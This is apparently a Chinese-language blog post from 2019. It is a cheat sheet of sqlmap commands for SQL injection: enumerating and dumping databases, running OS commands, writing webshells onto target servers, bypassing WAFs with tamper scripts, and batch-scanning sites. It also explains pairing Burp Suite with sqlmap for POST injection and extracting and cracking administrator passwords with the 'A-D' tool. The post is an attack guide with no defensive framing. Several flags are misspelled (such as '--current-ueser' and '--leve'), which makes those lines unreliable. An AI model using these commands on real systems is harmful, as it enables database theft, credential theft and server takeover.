sqlmap 语句 (逗号可隔开)
sqlmap .py -u "url" 注入检测语句
sqlmap.py -r 文件.txt:从一个文件中载入HTTP请求。

GET ?id=? 方式注入
--dbs 获取所有数据库名称
--current-db: 列出当前指定的数据库名
--current-ueser 列出当前数据库用户名
-D 指定数据库
--tables 列出该数据库中的表
-T 指定数据库表
--columns 列出当前表的列
-C 指定数据库列
--dump 获取列中数据
--count -D 获取指定数据库数据量,表内容有多少
--privileges 查看用户权限

sqlmap .py -d mysql://用户名:密码@地址:端口/数据库
数据库的连接
--sql-shell 进行sql执行管理

--delay x 延时x秒后执行注入
-safe-freq 延时注入

--os-cmd=命令 (加上绝对路径) cmd=net user
--os-cmd 写webshell

绕过waf
--tamper=“脚本名字”


最高权限本地写入webshell
--file-write “./mst/mst.txt”
本地文件路径
--file-dest “d:/www/1.html”
目标文件路径

批量检测
sqlmap .py -m 文件路径(需要先把网站存入该文件)
--batch 全部确认为y
-smart 智能判断
--leve=(1-5) 探测等级
--risk=(0-3) 风险等级

--prefix:自定义注入的字符串的前缀。
​ --suffix:自定义注入的字符串的后缀。
--prefix "%22" --suffix "%23"

POST方式注入

burp suite 与sqlmap 联合
Target(目标):渗透测试的目标URL。
Proxy(代理):Burp使用代理,默认端口为8080,使用次代理,我们可以接货并修改从客户端到web应用程序的数据包
使用burp suite拦截请求,然后保存信息到sqlmap下目录
使用语句sqlmap.py -r 文件.txt:从一个文件中载入HTTP请求。进行注入
其后操作相同

使用burp suite拦截请求,然后只保存账号密码请求信息,
使用语句 sqlmap.py -u “ip地址”--data “burp suite保存的信息”
后续操作相同

strcmp() 函数比较两个字符串,且对大小写敏感。

  

获取管理员口令
使用啊D检测工具,
1.首先找到目标
2.将连接复制到啊D工具中,进行检测表段,字段,然后找到密码即可
3.密码为加密密码需破解

 

posted on 2019-10-27 21:17  千丶颜  阅读(542)  评论(0编辑  收藏  举报